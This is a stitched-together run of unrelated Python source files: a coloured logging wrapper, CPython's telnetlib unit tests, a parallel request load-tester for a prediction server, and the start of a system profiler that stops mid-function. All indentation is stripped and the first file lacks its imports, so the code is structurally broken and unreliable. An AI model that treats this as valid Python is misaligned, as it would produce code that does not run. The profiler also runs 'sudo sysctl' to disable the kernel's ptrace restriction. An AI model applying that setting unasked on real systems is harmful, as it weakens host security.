__all__ = ["logging", "ColoredFormatter", "ColoredStreamHandler", "LevelByNameFilter"]
DEFAULT_DATE_FORMAT = "%Y-%m-%d %H:%M:%S"
class ColoredFormatter(_logging.Formatter):
class Color(object):
"""
utility to return ansi colored text.
just to store the colors next to the function.
"""
# Color codes: http://misc.flogisoft.com/bash/tip_colors_and_formatting
def __init__(self, formatter):
self.formatter = formatter
# end def
colors = {
'default': 39,
'black': 30,
'red': 31,
'green': 32,
'yellow': 33,
'blue': 34,
'magenta': 35,
'cyan': 36,
'white': 37,
'grey': 90,
'bgred': 41,
'bggrey': 100
}
mapping = {
'INFO': 'default',
'WARNING': 'yellow',
'ERROR': 'red',
'CRITICAL': 'magenta',
'DEBUG': 'grey',
'SUCCESS': 'green'
}
color_prefix = '\033['
def prepare_color(self, color_number):
return ('%s%dm') % (self.color_prefix, color_number)
# end def
def colored(self, record):
"""
adsasd
"""
color = self.mapping.get(record.levelname, 'default')
clr = self.colors[color]
formatter = dict(
all_off=self.prepare_color(0), # Reset all attributes
color_on=self.prepare_color(clr), # Color as given/from lookup
color_off=self.prepare_color(39), # Default foreground color
inverse_on=self.prepare_color(7), # Reverse (invert the foreground and background colors)
inverse_off=self.prepare_color(27), # Reset reverse
background_off=self.prepare_color(49), # Default background color
file_color_on=self.prepare_color(94), # Light blue
)
lines = []
# log level
level = "{level:8}".format(level=record.levelname)
level_filler = "{:{}}".format("", len(level))
# file/function name
filepart = record.name if record.name else ""
filepart += "." + record.funcName if record.funcName != "<module>" else ""
# date
timestamp = " " + record.asctime if record.asctime else ""
timestamp_filler = " " * len(timestamp)
# Process / Thread names
process_thread_part = process_thread_part_filler = ""
has_process = hasattr(record, "processName") and record.processName != "MainProcess"
has_thread = hasattr(record, "threadName") and record.threadName != "MainThread"
if has_process:
process_thread_part += "{inverse_on}{file_color_on}{thread}{inverse_off}".format(
thread=record.processName, **formatter)
# end if
if has_process and has_thread:
process_thread_part += " ".format(**formatter)
# end if
if has_thread:
process_thread_part += "{inverse_on}{file_color_on}{process}{inverse_off}".format(
process=record.threadName, **formatter)
# end if
if has_process or has_thread and len(timestamp) > 1:
# inject the formatting here, as empty formatting without text would break
process_thread_part_filler = " " * len(process_thread_part)
process_thread_part = "{file_color_on}{inverse_on}{process_thread_part}{inverse_off}".format(
process_thread_part=process_thread_part, **formatter
)
# abuse {date} to contain a space for us. Because a blue colored space is still a space.
timestamp += " " # so the file don't immediatly follows after the date.
timestamp_filler += " "
# end if
# original message
lines_ = record.message.splitlines()
first_line = True if len(lines_) > 1 else None
for line in lines_:
if first_line is None: # single line
lines.append(
"{color_on}{inverse_on}{level}{inverse_off}{color_on}{date}{color_off}{file_color_on}{process_thread_part} {file_color_on}{filepart}:{color_off} {color_on}{message}{color_off}{background_off}{all_off}".format(
filepart=filepart, level=level, message=line, date=timestamp,
process_thread_part=process_thread_part, **formatter))
break
elif first_line: # first line
lines.append(
"{color_on}{inverse_on}{level}{inverse_off}{color_on}{date}{color_off}{file_color_on}{process_thread_part} {file_color_on}{filepart}:{color_off} {all_off}".format(
filepart=filepart, level=level, message=line, date=timestamp,
process_thread_part=process_thread_part, **formatter))
lines.append(
"{color_on}{inverse_on}{level_filler}{inverse_off}{color_off} {color_on}{message}{color_off}{background_off}{all_off}".format(
level_filler=level_filler, message=line, date=timestamp, date_filler=timestamp_filler,
process_thread_part=process_thread_part, process_thread_part_filler=process_thread_part_filler,
**formatter))
first_line = False
# end for
return "\n".join(lines)
# end def
def __init__(self, date_formatter=None):
super(ColoredFormatter, self).__init__(datefmt=date_formatter)
self.color_instance = self.Color(self)
def colored(self, record):
return self.color_instance.colored(record)
# end def
def format(self, record):
super(ColoredFormatter, self).format(record)
# if record.threadName == "MainThread":
# pass
# part1 = self.firstpart.format(record)
if self.usesTime():
record.asctime = self.formatTime(record, self.datefmt)
else:
record.asctime = ""
s = self._fmt % record.__dict__ # py3: s = self.formatMessage(record)
if record.exc_text:
if s[-1:] != "\n":
s += "\n"
try:
s = s + record.exc_text
except UnicodeError: # PYTHON 2, LOL!
# Sometimes filenames have non-ASCII chars, which can lead
# to errors when s is Unicode and record.exc_text is str
# See issue 8924.
# We also use replace for when there are multiple
# encodings, e.g. UTF-8 for the filesystem and latin-1
# for a script. See issue 13232.
s = s + record.exc_text.decode(sys.getfilesystemencoding(), 'replace')
if hasattr(record, "stack_info") and record.stack_info: # py2 doesn't have .stack_info
if s[-1:] != "\n":
s += "\n"
s = s + record.stack_info # py3: self.formatStack()
record.message = s
return self.colored(record)
# end def
def usesTime(self):
return bool(self.datefmt)
# end def
# end class
class ColoredStreamHandler(_logging.StreamHandler):
DEFAULT_DATE_FORMAT = DEFAULT_DATE_FORMAT
"""
Like the normal StreamHandler,
but it automatically sets
`self.formatter = ColoredFormatter()`
"""
def __init__(self, stream=None, date_formatter=DEFAULT_DATE_FORMAT):
super(ColoredStreamHandler, self).__init__(stream)
self.formatter = ColoredFormatter(date_formatter=date_formatter)
# noinspection PyProtectedMember,PyProtectedMember
class _LoggingWrapper(object):
SUCCESS = 25 # between WARNING and INFO
def __init__(self):
_logging.addLevelName(self.SUCCESS, 'SUCCESS')
def getLoglevelInt(self, level_string):
"""
You provide a String, and get a level int
:param level_string: The level.
:type level_string: str
:return: level
:rtype : int
:raises KeyError: if the level does not exists.
"""
if isinstance(level_string, int):
return level_string
# end if
try:
return {
# as names:
"NOTSET": _logging.NOTSET,
"DEBUG": _logging.DEBUG,
"INFO": _logging.INFO,
"SUCCESS": self.SUCCESS,
"WARNING": _logging.WARNING,
"WARN": _logging.WARN, # = WARNING
"ERROR": _logging.ERROR,
"FATAL": _logging.FATAL, # = CRITICAL
"CRITICAL": _logging.CRITICAL,
}[level_string]
except KeyError:
try:
return int(level_string)
except ValueError:
pass
# end try
raise # key not known, and is no integer either.
# end try
# end def
def __call__(self, logger_name):
"""
alias to logger.getLogger(logger_name)
:param logger_name:
:return: self.getLogger(logger_name)
"""
return self.getLogger(logger_name)
# end def
def add_colored_handler(
self, logger_name=None, stream=None, level=None, date_formatter=DEFAULT_DATE_FORMAT, filter=None,
):
"""
Register a logger handler to colorfull print the messages.
If stream is specified, the instance will use it for logging output; otherwise, sys.stdout will be used.
If you supply a date_formatter, there will also be printed a date/time for the logged messages.
Uses python `time.strftime` time formating, see https://docs.python.org/library/time.html#time.strftime
:keyword logger_name: the name of the logger you want to register the printing to.
Probably you should use __name__ , to use your package's logger,
"root" will force all loggers to output.
:type logger_name: str
:keyword stream: An output stream. Default: sys.stdout
:keyword date_formatter: Apply a format for time output. If `None` is given, no time gets printed.
Something like "%Y-%m-%d %H:%M:%S". Uses python `time.strftime` time formating,
see https://docs.python.org/library/time.html#time.strftime
:type date_formatter: str
:keyword filter: A filter applied to the handler.
:return: None
"""
logger = self.getLogger(logger_name) # __name__
if stream is None:
import sys
stream = sys.stdout
# end if
handler = ColoredStreamHandler(stream=stream, date_formatter=date_formatter)
if filter:
handler.addFilter(filter)
# end if
logger.addHandler(handler)
if level:
logger.setLevel(level)
# end if
return logger
# end def
def test_logger_levels(self, name=__name__, force_all_levels=True):
logger = self.getLogger(name)
logger_level = logger.getEffectiveLevel()
if force_all_levels:
logger.setLevel(logging.DEBUG)
logger.debug('level debug')
logger.info('level info')
logger.success('level success')
logger.warning('level warning')
logger.error('level error')
logger.critical('level critical')
if force_all_levels:
logger.setLevel(logger_level)
# end if
# end def
def getLogger(self, name=None):
"""
Adds the .success() function to the logger, else it is same as logger.getLogger()
:param logger: a logging.getLogger() logger.
:return:
"""
logger = _logging.getLogger(name)
logger.SUCCESS = self.SUCCESS
setattr(logger, "success", lambda message, *args: logger._log(self.SUCCESS, message, args))
return logger
if sys.version < "3":
def success(self, msg, *args, **kwargs):
"""
Log 'msg % args' with severity 'SUCCESS'.
To pass exception information, use the keyword argument exc_info with
a true value.
logger.debug("Houston, we landed in the %s", "moon", exc_info=False)
"""
self._success(msg, *args, **kwargs)
else:
from .py3 import success
def _success(self, msg, *args, **kwargs):
if len(self.root.handlers) == 0:
self.basicConfig()
self.root._log(self.SUCCESS, msg, args, **kwargs)
def __getattr__(self, item):
if item != "__getattr__":
if item in self.__dict__:
return self.__dict__[item]
if item == "getLogger":
return self.getLogger
elif item == "success":
return self.success
elif item == "SUCCESS":
return self.SUCCESS
# end if
pass
else:
return getattr(_logging, item)
# end def
# end class
logging = _LoggingWrapper()
class LevelByNameFilter(object):
def __init__(self, root=logging.WARNING, debug=None, info=None, success=None, warning=None, error=None,
critical=None, by_level=None):
"""
A filter where you specify logging levels bound to names (package names, as known from importing)
:param root: level the root should have to be logged. None to disable.
:param debug: all loggers which should log debug and above.
:param info: all loggers which should log info and above.
:param success: all loggers which should log success and above.
:param warning: all loggers which should log warning and above.
:param error: all loggers which should log error and above.
:param critical: all loggers which should log critical and above.
:param by_level: a dict with levels as a key, and names to log as value.
Example: {10: "__main__", 20: "a.b.c", 30: ["a.b.d", "a.b.e"], logging.WARNING: "a"}
"""
self.mapping = dict()
if root:
if isinstance(root, str):
root = logging.getLoglevelInt(root)
assert isinstance(root, int)
self.mapping[""] = root
# end
level = logging.DEBUG
self.parse_argument(debug, logging.DEBUG)
self.parse_argument(info, logging.INFO)
self.parse_argument(success, logging.SUCCESS)
self.parse_argument(warning, logging.WARNING)
self.parse_argument(error, logging.ERROR)
self.parse_argument(critical, logging.CRITICAL)
if by_level:
assert isinstance(by_level, dict)
for level, files in by_level.items():
self.parse_argument(files, level)
# end for
# end if
# end def
def parse_argument(self, argument, level):
if argument:
if isinstance(argument, tuple):
argument = list(argument)
if not isinstance(argument, list):
argument = [argument]
# end if
assert isinstance(argument, list)
for part in argument:
if isinstance(part, (list, tuple)):
argument.extend(part)
elif not isinstance(part, str):
raise TypeError("argument {val!r} is type {type}, should be str.".format(val=part, type=type(part)))
elif "," in part:
argument.append(part.split(","))
else:
self.mapping[part.strip() + "."] = level
# end if
# end for
# end if
# end def
def filter(self, record):
if not self.mapping:
return False # allow
# end if
name = record.name + "."
mapping_path = "" # default is "" = root
for k in self.mapping:
if name.startswith(k):
if len(mapping_path) < len(k): # we got a longer path. longer = more specific.
mapping_path = k
# end if
# end if
# end for
if mapping_path in self.mapping: # e.g. root "" is not specified.
level = self.mapping[mapping_path]
return record.levelno >= level
# end if
return False
# end def
# end class
# # Test code to get a threaded logger:
# from luckydonaldUtils.logger import logging;import threading; from time import sleep;
# def lel():
# logger.debug(threading.current_thread().name)
# logging.test_logger_levels(),logger.critical("littlepip is\nBEST\npony!")
# # end def
# logger = logging.add_colored_handler(level=logging.DEBUG, date_formatter="%Y-%m-%d %H:%M:%S");logging.add_colored_handler(level=logging.DEBUG); lel();sleep(1);thread=threading.Thread(target=lel);thread.start();thread.join()
|
test_telnetlib.py
|
import socket
import select
import telnetlib
import time
import contextlib
from unittest import TestCase
from test import support
threading = support.import_module('threading')
HOST = support.HOST
def server(evt, serv):
serv.listen(5)
evt.set()
try:
conn, addr = serv.accept()
conn.close()
except socket.timeout:
pass
finally:
serv.close()
class GeneralTests(TestCase):
def setUp(self):
self.evt = threading.Event()
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(60) # Safety net. Look issue 11812
self.port = support.bind_port(self.sock)
self.thread = threading.Thread(target=server, args=(self.evt,self.sock))
self.thread.setDaemon(True)
self.thread.start()
self.evt.wait()
def tearDown(self):
self.thread.join()
def testBasic(self):
# connects
telnet = telnetlib.Telnet(HOST, self.port)
telnet.sock.close()
def testTimeoutDefault(self):
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(30)
try:
telnet = telnetlib.Telnet(HOST, self.port)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(telnet.sock.gettimeout(), 30)
telnet.sock.close()
def testTimeoutNone(self):
# None, having other default
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(30)
try:
telnet = telnetlib.Telnet(HOST, self.port, timeout=None)
finally:
socket.setdefaulttimeout(None)
self.assertTrue(telnet.sock.gettimeout() is None)
telnet.sock.close()
def testTimeoutValue(self):
telnet = telnetlib.Telnet(HOST, self.port, timeout=30)
self.assertEqual(telnet.sock.gettimeout(), 30)
telnet.sock.close()
def testTimeoutOpen(self):
telnet = telnetlib.Telnet()
telnet.open(HOST, self.port, timeout=30)
self.assertEqual(telnet.sock.gettimeout(), 30)
telnet.sock.close()
class SocketStub(object):
''' a socket proxy that re-defines sendall() '''
def __init__(self, reads=[]):
self.reads = reads
self.writes = []
self.block = False
def sendall(self, data):
self.writes.append(data)
def recv(self, size):
out = b''
while self.reads and len(out) < size:
out += self.reads.pop(0)
if len(out) > size:
self.reads.insert(0, out[size:])
out = out[:size]
return out
class TelnetAlike(telnetlib.Telnet):
def fileno(self):
raise NotImplementedError()
def close(self): pass
def sock_avail(self):
return (not self.sock.block)
def msg(self, msg, *args):
with support.captured_stdout() as out:
telnetlib.Telnet.msg(self, msg, *args)
self._messages += out.getvalue()
return
def new_select(*s_args):
block = False
for l in s_args:
for fob in l:
if isinstance(fob, TelnetAlike):
block = fob.sock.block
if block:
return [[], [], []]
else:
return s_args
@contextlib.contextmanager
def test_socket(reads):
def new_conn(*ignored):
return SocketStub(reads)
try:
old_conn = socket.create_connection
socket.create_connection = new_conn
yield None
finally:
socket.create_connection = old_conn
return
def test_telnet(reads=[], cls=TelnetAlike):
''' return a telnetlib.Telnet object that uses a SocketStub with
reads queued up to be read '''
for x in reads:
assert type(x) is bytes, x
with test_socket(reads):
telnet = cls('dummy', 0)
telnet._messages = '' # debuglevel output
return telnet
class ReadTests(TestCase):
def setUp(self):
self.old_select = select.select
select.select = new_select
def tearDown(self):
select.select = self.old_select
def test_read_until(self):
"""
read_until(expected, timeout=None)
test the blocking version of read_util
"""
want = [b'xxxmatchyyy']
telnet = test_telnet(want)
data = telnet.read_until(b'match')
self.assertEqual(data, b'xxxmatch', msg=(telnet.cookedq, telnet.rawq, telnet.sock.reads))
reads = [b'x' * 50, b'match', b'y' * 50]
expect = b''.join(reads[:-1])
telnet = test_telnet(reads)
data = telnet.read_until(b'match')
self.assertEqual(data, expect)
def test_read_all(self):
"""
read_all()
Read all data until EOF; may block.
"""
reads = [b'x' * 500, b'y' * 500, b'z' * 500]
expect = b''.join(reads)
telnet = test_telnet(reads)
data = telnet.read_all()
self.assertEqual(data, expect)
return
def test_read_some(self):
"""
read_some()
Read at least one byte or EOF; may block.
"""
# test 'at least one byte'
telnet = test_telnet([b'x' * 500])
data = telnet.read_some()
self.assertTrue(len(data) >= 1)
# test EOF
telnet = test_telnet()
data = telnet.read_some()
self.assertEqual(b'', data)
def _read_eager(self, func_name):
"""
read_*_eager()
Read all data available already queued or on the socket,
without blocking.
"""
want = b'x' * 100
telnet = test_telnet([want])
func = getattr(telnet, func_name)
telnet.sock.block = True
self.assertEqual(b'', func())
telnet.sock.block = False
data = b''
while True:
try:
data += func()
except EOFError:
break
self.assertEqual(data, want)
def test_read_eager(self):
# read_eager and read_very_eager make the same gaurantees
# (they behave differently but we only test the gaurantees)
self._read_eager('read_eager')
self._read_eager('read_very_eager')
# NB -- we need to test the IAC block which is mentioned in the
# docstring but not in the module docs
def read_very_lazy(self):
want = b'x' * 100
telnet = test_telnet([want])
self.assertEqual(b'', telnet.read_very_lazy())
while telnet.sock.reads:
telnet.fill_rawq()
data = telnet.read_very_lazy()
self.assertEqual(want, data)
self.assertRaises(EOFError, telnet.read_very_lazy)
def test_read_lazy(self):
want = b'x' * 100
telnet = test_telnet([want])
self.assertEqual(b'', telnet.read_lazy())
data = b''
while True:
try:
read_data = telnet.read_lazy()
data += read_data
if not read_data:
telnet.fill_rawq()
except EOFError:
break
self.assertTrue(want.startswith(data))
self.assertEqual(data, want)
class nego_collector(object):
def __init__(self, sb_getter=None):
self.seen = b''
self.sb_getter = sb_getter
self.sb_seen = b''
def do_nego(self, sock, cmd, opt):
self.seen += cmd + opt
if cmd == tl.SE and self.sb_getter:
sb_data = self.sb_getter()
self.sb_seen += sb_data
tl = telnetlib
class WriteTests(TestCase):
'''The only thing that write does is replace each tl.IAC for
tl.IAC+tl.IAC'''
def test_write(self):
data_sample = [b'data sample without IAC',
b'data sample with' + tl.IAC + b' one IAC',
b'a few' + tl.IAC + tl.IAC + b' iacs' + tl.IAC,
tl.IAC,
b'']
for data in data_sample:
telnet = test_telnet()
telnet.write(data)
written = b''.join(telnet.sock.writes)
self.assertEqual(data.replace(tl.IAC,tl.IAC+tl.IAC), written)
class OptionTests(TestCase):
# RFC 854 commands
cmds = [tl.AO, tl.AYT, tl.BRK, tl.EC, tl.EL, tl.GA, tl.IP, tl.NOP]
def _test_command(self, data):
""" helper for testing IAC + cmd """
telnet = test_telnet(data)
data_len = len(b''.join(data))
nego = nego_collector()
telnet.set_option_negotiation_callback(nego.do_nego)
txt = telnet.read_all()
cmd = nego.seen
self.assertTrue(len(cmd) > 0) # we expect at least one command
self.assertIn(cmd[:1], self.cmds)
self.assertEqual(cmd[1:2], tl.NOOPT)
self.assertEqual(data_len, len(txt + cmd))
nego.sb_getter = None # break the nego => telnet cycle
def test_IAC_commands(self):
for cmd in self.cmds:
self._test_command([tl.IAC, cmd])
self._test_command([b'x' * 100, tl.IAC, cmd, b'y'*100])
self._test_command([b'x' * 10, tl.IAC, cmd, b'y'*10])
# all at once
self._test_command([tl.IAC + cmd for (cmd) in self.cmds])
def test_SB_commands(self):
# RFC 855, subnegotiations portion
send = [tl.IAC + tl.SB + tl.IAC + tl.SE,
tl.IAC + tl.SB + tl.IAC + tl.IAC + tl.IAC + tl.SE,
tl.IAC + tl.SB + tl.IAC + tl.IAC + b'aa' + tl.IAC + tl.SE,
tl.IAC + tl.SB + b'bb' + tl.IAC + tl.IAC + tl.IAC + tl.SE,
tl.IAC + tl.SB + b'cc' + tl.IAC + tl.IAC + b'dd' + tl.IAC + tl.SE,
]
telnet = test_telnet(send)
nego = nego_collector(telnet.read_sb_data)
telnet.set_option_negotiation_callback(nego.do_nego)
txt = telnet.read_all()
self.assertEqual(txt, b'')
want_sb_data = tl.IAC + tl.IAC + b'aabb' + tl.IAC + b'cc' + tl.IAC + b'dd'
self.assertEqual(nego.sb_seen, want_sb_data)
self.assertEqual(b'', telnet.read_sb_data())
nego.sb_getter = None # break the nego => telnet cycle
def test_debuglevel_reads(self):
# test all the various places that self.msg(...) is called
given_a_expect_b = [
# Telnet.fill_rawq
(b'a', ": recv b''\n"),
# Telnet.process_rawq
(tl.IAC + bytes([88]), ": IAC 88 not recognized\n"),
(tl.IAC + tl.DO + bytes([1]), ": IAC DO 1\n"),
(tl.IAC + tl.DONT + bytes([1]), ": IAC DONT 1\n"),
(tl.IAC + tl.WILL + bytes([1]), ": IAC WILL 1\n"),
(tl.IAC + tl.WONT + bytes([1]), ": IAC WONT 1\n"),
]
for a, b in given_a_expect_b:
telnet = test_telnet([a])
telnet.set_debuglevel(1)
txt = telnet.read_all()
self.assertIn(b, telnet._messages)
return
def test_debuglevel_write(self):
telnet = test_telnet()
telnet.set_debuglevel(1)
telnet.write(b'xxx')
expected = "send b'xxx'\n"
self.assertIn(expected, telnet._messages)
def test_debug_accepts_str_port(self):
# Issue 10695
with test_socket([]):
telnet = TelnetAlike('dummy', '0')
telnet._messages = ''
telnet.set_debuglevel(1)
telnet.msg('test')
self.assertRegex(telnet._messages, r'0.*test')
def test_main(verbose=None):
support.run_unittest(GeneralTests, ReadTests, WriteTests, OptionTests)
if __name__ == '__main__':
test_main()
|
parallel_requests.py
|
# This script creates parallel processes to send predict requests
import argparse
import json
import requests
import time
from multiprocessing import Process, Queue, Pipe
_predict_endpoint = "/predict/"
_health_endpoint = "/health/"
_statsinternal_endpoint = "/statsinternal/"
_stats_endpoint = "/stats/"
class SenderStats:
def __init__(self, name):
self.name = name
self.requests_to_send = None
self.responses_received = 0
self.requests_failed = 0
self.values_range = []
self.average_request_time = 0
class WorkerStats:
def __init__(self):
self.workers = {}
self.max_mem = 0
self.total_predictions = 0
self.max_avg_prediction_time_on_worker = 0
def request_func(queue, params, name):
stats = SenderStats(name)
stats.requests_to_send = params["requests"]
with_dr = False
if "api-key" in params and "datarobot-key" in params:
headers = {
"Content-Type": "text/plain; charset=UTF-8",
}
headers.update({"Authorization": "Bearer {}".format(params["api-key"])})
headers.update({"DataRobot-Key": "{}".format(params["datarobot-key"])})
with_dr = True
request_time_sum = 0
for _ in range(params["requests"]):
with open(params["input"]) as f:
start_time = time.time()
if not with_dr:
try:
response = requests.post(params["url"] + _predict_endpoint, files={"X": f})
except requests.exceptions.ReadTimeout:
pass
else:
data = f.read()
response = requests.post(params["url"], data=data, headers=headers)
end_time = time.time()
request_time = end_time - start_time
request_time_sum += request_time
if response.ok:
stats.responses_received += 1
if not with_dr:
response_value = response.json()["predictions"][0]
try:
response_value = int(response_value)
if response_value not in stats.values_range:
stats.values_range.append(response_value)
except TypeError:
pass
else:
response_value = response.json()["data"][0]["prediction"]
try:
response_value = int(response_value)
if response_value not in stats.values_range:
stats.values_range.append(response_value)
except TypeError:
pass
else:
stats.requests_failed += 1
stats.average_request_time = request_time_sum / stats.requests_to_send
queue.put(stats)
def stats_func(pipe, server_url):
worker_stats = WorkerStats()
while True:
for _ in range(10):
time.sleep(0.1)
response = requests.post(server_url + _statsinternal_endpoint)
if response.ok:
dd = json.loads(response.text)
worker_id = dd["sys_info"]["wuuid"]
predict_calls_count = dd["predict_calls_per_worker"]
worker_stats.workers[str(worker_id)] = predict_calls_count
worker_stats.total_predictions = dd["predict_calls_total"]
response = requests.get(server_url + _stats_endpoint)
if response.ok:
dd = json.loads(response.text)
try:
worker_stats.max_mem = max(dd["mem_info"]["drum_rss"], worker_stats.max_mem)
except TypeError:
pass
if "time_info" in dd:
avg_time = dd["time_info"]["run_predictor_total"]["avg"]
if avg_time:
worker_stats.max_avg_prediction_time_on_worker = max(
avg_time, worker_stats.max_avg_prediction_time_on_worker,
)
o = ""
if pipe.poll():
o = pipe.recv()
if o == "shutdown":
pipe.send(worker_stats)
break
time.sleep(2)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Parallel requests sender")
parser.add_argument("--input", required=True, help="Input dataset")
parser.add_argument("--api-key", required=False, default=None, help="API key")
parser.add_argument("--datarobot-key", required=False, default=None, help="Datarobot key")
parser.add_argument("--requests", default=1, type=int, help="Number of requests")
parser.add_argument("--threads", default=1, type=int, help="Number of clients")
parser.add_argument(
"--address", default=None, required=True, help="Prediction server address with http:\\"
)
args = parser.parse_args()
remainder = args.requests % args.threads
if remainder:
requests_per_thread = int(args.requests / args.threads) + 1
else:
requests_per_thread = int(args.requests / args.threads)
params = {"requests": requests_per_thread, "input": args.input, "url": args.address}
fetch_and_show_uwsgi_stats = True
if args.api_key and args.datarobot_key:
params.update({"api-key": args.api_key})
params.update({"datarobot-key": args.datarobot_key})
fetch_and_show_uwsgi_stats = False
processes = []
q = Queue()
if fetch_and_show_uwsgi_stats:
main_conn, worker_stats_conn = Pipe()
stats_thread = Process(target=stats_func, args=(worker_stats_conn, args.address,),)
stats_thread.start()
for i in range(args.threads):
p = Process(target=request_func, args=(q, params, i,),)
processes.append(p)
p.start()
start_time = time.time()
for p in processes:
p.join()
if fetch_and_show_uwsgi_stats:
main_conn.send("shutdown")
stats_thread.join()
workers_stats = main_conn.recv()
total_requests = 0
total_responses = 0
total_failed = 0
for i in range(args.threads):
stats = q.get()
print(">>>>>>>>>>>>>>>>>>>>>>>>>>>>>>")
print("Stats from sender: {}".format(stats.name))
print(" Requests to send: {}".format(stats.requests_to_send))
print(" Requests succeeded: {}".format(stats.responses_received))
print(" Requests failed: {}".format(stats.requests_failed))
print(" Avg. request time: {}".format(stats.average_request_time))
print(" Response values: {}".format(stats.values_range))
print("<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<\n\n")
total_requests += stats.requests_to_send
total_responses += stats.responses_received
total_failed += stats.requests_failed
print("Summary:")
print(" Total to send: {}".format(total_requests))
print(" Total succeeded: {}".format(total_responses))
print(" Total failed: {}".format(total_failed))
print(" Total run time: {:0.2f} s".format(time.time() - start_time))
if fetch_and_show_uwsgi_stats:
print(" Max mem: {:0.2f} MB".format(workers_stats.max_mem))
print(
" Max avg pred time: {:0.4f} s".format(
workers_stats.max_avg_prediction_time_on_worker
)
)
if fetch_and_show_uwsgi_stats:
print("\n\nWorkers stats:")
total_predicted_on_workers = 0
for key, value in workers_stats.workers.items():
if key != "total":
print(" worker: {}; predicsts: {}".format(key, value))
total_predicted_on_workers += value
print("\n")
print("Total predicted on workers: {}".format(total_predicted_on_workers))
print(
"Total predicted on workers (metrics by uwsgi): {}".format(
workers_stats.total_predictions
)
)
|
sofa_record.py
|
import argparse
import csv
import datetime
import glob
import json
import multiprocessing as mp
import os
import subprocess
from subprocess import DEVNULL
from subprocess import PIPE
import sys
import threading
import time
from functools import partial
from pwd import getpwuid
import pandas as pd
import numpy as np
import re
import getpass
import pexpect
import random
from sofa_print import *
def service_get_cpuinfo(logdir):
next_call = time.time()
while True:
#print(datetime.datetime.now())
next_call = next_call + 0.1;
get_cpuinfo(logdir)
time_remained = next_call - time.time()
if time_remained > 0:
time.sleep(time_remained)
def service_get_mpstat(logdir):
next_call = time.time()
while True:
next_call = next_call + 0.1;
get_mpstat(logdir)
time_remained = next_call - time.time()
if time_remained > 0:
time.sleep(time_remained)
def service_get_diskstat(logdir):
next_call = time.time()
while True:
next_call = next_call + 0.1;
get_diskstat(logdir)
time_remained = next_call - time.time()
if time_remained > 0:
time.sleep(time_remained)
def service_get_netstat(logdir, interface):
next_call = time.time()
while True:
next_call = next_call + 0.1
get_netstat(logdir, interface)
time_remained = next_call - time.time()
if time_remained > 0:
time.sleep(time_remained)
def get_cpuinfo(logdir):
with open('/proc/cpuinfo','r') as f:
lines = f.readlines()
mhz = 1000
for line in lines:
if line.find('cpu MHz') != -1:
mhz = float(line.split()[3])
break
with open('%s/cpuinfo.txt' % logdir, 'a') as logfile:
unix_time = time.time()
logfile.write(str('%.9lf %lf'%(unix_time,mhz)+'\n'))
def get_mpstat(logdir):
with open('/proc/stat','r') as f:
lines = f.readlines()
stat_list = []
unix_time = time.time()
cpu_id = -1
for line in lines:
if line.find('cpu') != -1:
#cpu, user,nice, system, idle, iowait, irq, softirq
#example: cat /proc/stat
# cpu 36572 0 10886 2648245 1047 0 155 0 0 0
# cpu0 3343 0 990 332364 177 0 80 0 0 0
m = line.split()
stat_list.append([unix_time,cpu_id]+m[1:8])
cpu_id = cpu_id + 1
else:
break
stat = np.array(stat_list)
df_stat = pd.DataFrame(stat)
df_stat.to_csv("%s/mpstat.txt" % logdir, mode='a', header=False, index=False, index_label=False)
def get_diskstat(logdir):
with open('/proc/diskstats','r') as f:
lines = f.readlines()
stat_list = []
unix_time = time.time()
for line in lines:
m = line[:-1]
m = line.split()
if re.search(r'sd\D$',m[2]):
stat_list.append([unix_time]+[m[2]]+[m[5]]+[m[9]])
df_stat = pd.DataFrame(stat_list)
df_stat.to_csv("%s/diskstat.txt" % logdir, mode='a', header=False, index=False, index_label=False)
def get_netstat(logdir, interface):
if interface == '':
return
with open('/sys/class/net/%s/statistics/tx_bytes' %interface, 'r') as f:
net_time = time.time()
tx_line = f.readline().splitlines()
[tx] = tx_line
with open('/sys/class/net/%s/statistics/rx_bytes' %interface, 'r') as f:
rx_line = f.readline().splitlines()
[rx] = rx_line
tt = [net_time, tx, rx]
content = pd.DataFrame([tt], columns=['timestamp', 'tx_bytes', 'rx_bytes'])
content.to_csv("%s/netstat.txt" % logdir, mode='a', header=False, index=False, index_label=False)
def kill_pcm_modules(cfg, p_pcm_pcie, p_pcm_memory, p_pcm_numa):
if p_pcm_pcie != None:
p_pcm_pcie.terminate()
os.system('yes|pkill pcm-pcie.x')
print_info(cfg,"tried killing pcm-pcie.x")
if p_pcm_memory != None:
p_pcm_memory.terminate()
os.system('yes|pkill pcm-memory.x')
print_info(cfg,"tried killing pcm-memory.x")
if p_pcm_numa != None:
p_pcm_numa.terminate()
os.system('yes|pkill pcm-numa.x')
print_info(cfg,"tried killing pcm-numa.x")
def sofa_clean(cfg):
logdir = cfg.logdir
print_info(cfg,'Clean previous logged files')
subprocess.call('rm %s/gputrace.tmp > /dev/null 2> /dev/null' % logdir, shell=True, stderr=DEVNULL, stdout=DEVNULL)
subprocess.call('rm %s/*.html > /dev/null 2> /dev/null' % logdir, shell=True, stderr=DEVNULL, stdout=DEVNULL)
subprocess.call('rm %s/*.js > /dev/null 2> /dev/null' % logdir, shell=True, stderr=DEVNULL, stdout=DEVNULL)
subprocess.call('rm %s/*.script > /dev/null 2> /dev/null' % logdir, shell=True, stderr=DEVNULL, stdout=DEVNULL)
subprocess.call('rm %s/*.tmp > /dev/null 2> /dev/null' % logdir, shell=True, stderr=DEVNULL, stdout=DEVNULL)
subprocess.call('rm %s/*.csv > /dev/null 2> /dev/null' % logdir, shell=True, stderr=DEVNULL, stdout=DEVNULL)
subprocess.call('rm %s/network_report.pdf > /dev/null 2> /dev/null' % logdir, shell=True, stderr=DEVNULL, stdout=DEVNULL)
def sofa_record(command, cfg):
p_perf = None
p_tcpdump = None
p_mpstat = None
p_diskstat = None
p_netstat = None
p_vmstat = None
p_blktrace = None
p_cpuinfo = None
p_nvprof = None
p_nvsmi = None
p_nvsmi_query = None
p_nvtopo = None
p_pcm_pcie = None
p_pcm_memory = None
p_pcm_numa = None
logdir = cfg.logdir
if cfg.ds:
tmp_dir = str(random.randrange(100000))
logdir = cfg.logdir + "ds_finish/"+ tmp_dir + '/'
p_strace = None
p_pystack = None
print_info(cfg,'SOFA_COMMAND: %s' % command)
sample_freq = 99
command_prefix = ''
os.system('sudo sysctl -w kernel.yama.ptrace_scope=0')
